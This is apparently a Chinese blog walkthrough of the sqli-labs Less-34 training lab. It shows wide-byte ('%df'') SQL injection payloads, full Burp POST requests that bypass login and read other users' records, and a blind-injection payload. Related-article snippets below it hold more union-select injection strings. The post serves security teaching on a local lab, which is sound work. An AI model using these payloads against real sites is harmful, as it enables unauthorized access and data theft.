sqli-labs————Less-34(宽字节绕过、水平越权、盲注)

最新推荐文章于 2024-04-18 10:17:51 发布
最新推荐文章于 2024-04-18 10:17:51 发布
阅读量2.5k 收藏 1
点赞数 1
分类专栏: 【渗透测试实战】 # Sqli-labs实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80287201
版权

Less-34


方法一:
这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: '。我们可以利用这一点注入。

使用万能密码方式来突破:

username: 'or 1=1#

passwor:aaa


方法二:

因为这里使用到了表单的提交,所以我们可以使用burp suite进行数据的提交,之后对提交的数据进行修改:

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'||1#&passwd=aaa&submit=Submit

从上面我们可以看到,我们并没有输入密码,却成功登录了,已越权

或者可以这样,获取别的用户的信息,实现水平越权:

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'or 1 limit 1,1#&passwd=aaa&submit=Submit

post型盲注通杀payload:

uname=admin%df'or()or%200%23&passwd=&submit=Submit
FLy_鹏程万里
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL-lab 29~37 字节注入
qq_52921637的博客
03-22 222
less29 本关是基于 index.php中的单引号字符型的注入 注入语句是:id=-1’ union select 1,2,3 – - 和login.php 基于单引号的参数污染绕过 注入语句是:id=1&id=-1’ union select 1,2,3 – - less30 本关与上关相似,login.php 基于双引号的参数污染绕过 注入语句是:id=1&id=-1" union select 1,2,3 – - less31 本关是,基于 “) 字符型的注入 注入语句是:id=-
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs之Less-34
m0_46315342的博客
06-04 771
                                          &nbs...
SQLi LABS Less-34_sqli-labs第三十四关,2024年最新网络安全性能优化面试题集锦
最新发布
2401_83974607的博客
04-18 426
【代码】SQLi LABS Less-34_sqli-labs第三十四关,2024年最新网络安全性能优化面试题集锦。
sqli-labs/Less-34
m0_71299382的博客
11-21 343
sqli-labs第三十四关
less-32-33-34
qq_44598397的博客
04-09 290
LESS-32 1、PHP编码转义一次,后面正则表达式还要再转义一次,所以有\\。党PHP转义后只剩\。再经过正则表达式就只剩下一个 2、/的作用表示后面是正则表达式 3、i表示区分大小写 上述函数为过滤 ‘ \ 的函数,将 ‘ 转为 \’ , 将 \ 转为 \ ,将 “ 转为 \”。 注释方法: 1、%df 吃掉 \ 具体的原因是 urlencode(‘) = %5c%27,我们在%5c%27...
sqli-labs(34)
weixin_30611509的博客
06-01 679
0x01构造闭合 同样 发现 ’被注释掉了 试探了一波发现什么信息都不会返回 正确错误的页面都一样 之前我们的方法就是将过滤函数添加的 \ 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为�' ...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
Sqli-labs less 34
weixin_34060299的博客
08-11 155
Less-34 本关是post型的注入漏洞,同样的也是将post过来的内容进行了 ' \ 的处理。由上面的例子可以看到我们的方法就是将过滤函数添加的 \ 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为 �' 。我们就可以...
SQLi LABS Less-34 报错注入
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第三十八关 SQLi38关
sqli-字节注入
weixin_47346400的博客
03-16 154
以下ppt来自大佬传送门 字节注入原理 初步探测: http://sqli-labs:65/Less-32/?id=1'-- 发现1’被转义为 ''所以判定为 字节注入 方法:在注入点后键入%df,然后按照正常的注入流程开始注入 原理:下图中的hint == -1�’ union select 1,2,(select user())-- ==、由于和源代码中的 ‘$id’产生闭合,所以就自然执行了 union select… 已知mysql注入的类型是字节了,下面就按照注入的基本
SQL注入 Less34(POST型字节注入+布尔盲注)
开心星人的博客
07-28 680
因为"users"用到了引号,使用子查询或者16进制方式(这个出了点问题,没出来)发现没有效果,并且%df直接显示出来了(之前都是显示不出来,是一个问号的图形)我们用burp进行字节注入即可。抓包,发现对%进行了URL编码。进行了转义,使用字节注入。......
sqli-labs/less-24;字节注入
xiaochenhang的博客
08-18 331
2、 当数据库的编码为GBK时,可以使用字节注入,字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
SQL-labs的第34关——报错注入 字节注入(POST)
qq_73393033的博客
08-09 340
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
SQL注入:sqli-labs 32 字节注入
Zeker62的博客
08-12 455
http://127.0.0.1/sqli/Less-32/?id=1不报错 http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符: Hint: The Query String you input is escaped as : 1’ The Query String you input in Hex becomes : 315c27 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。 显然第二行显示信.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值